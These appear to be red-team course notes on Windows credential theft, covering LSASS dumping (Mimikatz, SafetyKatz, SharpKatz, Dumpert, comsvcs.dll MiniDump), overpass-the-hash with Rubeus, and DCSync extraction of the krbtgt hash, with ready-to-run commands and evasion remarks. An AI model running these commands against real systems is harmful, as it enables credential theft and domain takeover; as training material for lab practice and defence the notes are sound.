6.2 - Credentials Extraction & Mimikatz

LSA & LSASS

The Local Security Authority (LSA) is a key component of the Windows security subsystem responsible for enforcing security policies, managing authentication, and storing sensitive data like user credentials and security tokens. It plays a crucial role in handling authentication requests, verifying user identities, and interacting with Active Directory in domain environments.

The Local Security Authority Subsystem Service (LSASS) is the process (lsass.exe) that runs LSA in user mode. It is responsible for authenticating users, managing access tokens, and storing credential hashes in memory. Due to its critical role, LSASS is a high-value target for attackers seeking to extract credentials, perform pass-the-hash attacks, or manipulate authentication mechanisms. Protecting LSASS is essential for maintaining system security, which is why modern Windows versions implement protections like Credential Guard and LSASS memory restrictions.

Extract Credentials without LSASS

This is a stealthier approach compared to direct LSASS dumping, and can be done using:

• SAM hive (Registry) - Local credentials

• LSA Secrets / Security Hive (Registry) - Service account passwords, domain cached credentials

• DPAPI Protected Credentials (Disk) - Credentials Manager / Vault, Browser Cookies, Certificates and Azure Tokens.

Mimikatz

Mimikatz is a powerful tool used for credential dumping, ticket extraction, and various attacks against Windows authentication mechanisms. Invoke-Mimikatz is a PowerShell-based version that leverages ReflectivePEInjection to load Mimikatz directly into memory, avoiding the need for writing files to disk. This makes it stealthier than traditional methods.

Running Invoke-Mimikatz requires administrative privileges, and some attacks need additional privileges, which will be discussed in their respective sections.

• Mimikatz: https://github.com/gentilkiwi/mimikatz

• Unofficial mimikatz guide: https://adsecurity.org/?p=2207

• Invoke-Mimitaz (Powershell): https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1

• SafetyKatz: https://github.com/GhostPack/SafetyKatz

• Impacket: https://github.com/SecureAuthCorp/impacket/

GitHub - gentilkiwi/mimikatz: A little tool to play with Windows securityGitHub

---

Extracting Credentials from LSASS

You need admin access on a machine.

Mimikatz

To dump credentials (eg. NTLM hash, AES) from LSASS on a local machine using Invoke-Mimikatz, run:

Invoke-Mimikatz -Command "sekurlsa::ekeys"

SafetyKatz

SafetyKatz is a minidump-based approach combined with PELoader to execute Mimikatz:

SafetyKatz.exe "sekurlsa::ekeys"

SharpKatz

SharpKatz is a C# implementation of certain Mimikatz functionalities:

SharpKatz.exe --Command ekeys

Dumpert (Direct System Calls & API Unhooking)

Dumpert evades traditional monitoring by leveraging direct system calls:

rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump

Pypykatz (Python-based Mimikatz Alternative)

For extracting credentials using Python:

pypykatz.exe live lsa

Comsvcs.dll for LSASS Dump

A built-in Windows DLL can be leveraged to dump LSASS memory:

tasklist /FI "IMAGENAME eq lsass.exe"
rundll32.exe C:\windows\System32\comsvcs.dll, MiniDump <lsass PID> C:\Users\Public\lsass.dmp full

Remote Credential Dumping

From a Linux machine, you can use:

• Impacket for remote credential extraction.

• Physmem2profit for memory analysis and credential retrieval.

---

After exactring credentials we can use: Pass-the-Hash / Pass-the-Ticket / OverPass-The-Hash

OverPass-The-Hash (Pass-the-Key)

OverPass-The-Hash (OPTH) that allows attackers to generate authentication tokens from NTLM hashes or Kerberos keys. It needs administrator right using Mimi/Safety-Katz and no elevation using Rubeus.

In the case of Pass-The-Hash it's necessary to read NTLM hash and use it to authenticate 'as a password' using local users credentials (eg. local administrator of machine), while OverPass-The-Hash uses NTLM or AES Key to obtain TGT Kerberos and authenticate on the system using domain users credentials (usually spawning a new powershell session).

Invoke-Mimikatz

To perform OPTH with AES256 encryption:

Invoke-Mimikatz -Command "sekurlsa::pth /user:Administrator /domain:us.techcorp.local /aes256:<aes256key> /run:powershell.exe"

SafetyKatz

SafetyKatz.exe "sekurlsa::pth /user:administrator /domain:us.techcorp.local /aes256:<aes256keys> /run:cmd.exe"

This starts a PowerShell session with logon type 9 (equivalent to runas /netonly).

Rubeus (Kerberos-focused Attack)

For OPTH using NTLM hashes (doesn’t require elevation):

Rubeus.exe asktgt /user:administrator /rc4:<ntlmhash> /ptt

For OPTH with AES256 encryption (requires elevation):

Rubeus.exe asktgt /user:administrator /aes256:<aes256keys> /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

---

DCSync Attack (Extracting Credentials from the Domain Controller)

DCSync allows an attacker to extract password hashes from a Domain Controller without executing code on it.

Mimikatz

Extracting the krbtgt Hash

To obtain the krbtgt hash using DCSync (requires Domain Admin privileges):

Invoke-Mimikatz -Command "lsadump::dcsync /user:us\krbtgt"

SafetyKatz

SafetyKatz.exe "lsadump::dcsync /user:us\krbtgt"

By default, Domain Admins, Enterprise Admins or Domain Controller privileges are required to execute this attack.

---

Other Resources:

• Mimikatz: https://github.com/gentilkiwi/mimikatz

• Unofficial mimikatz guide: https://adsecurity.org/?p=2207

• https://www.alteredsecurity.com/post/fantastic-windows-logon-types-and-where-to- find-credentials-in-them

• https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1

• https://github.com/b4rtik/SharpKatz

• https://github.com/outflanknl/Dumpert

• https://github.com/Flangvik/BetterSafetyKatz

• https://github.com/GhostPack/SafetyKatz

• https://github.com/skelsec/pypykatz

• https://github.com/Hackndo/lsassy

• https://github.com/SecureAuthCorp/impacket/

• https://github.com/FSecureLABS/physmem2profit

Labs

Refers to Learning Object 7 lab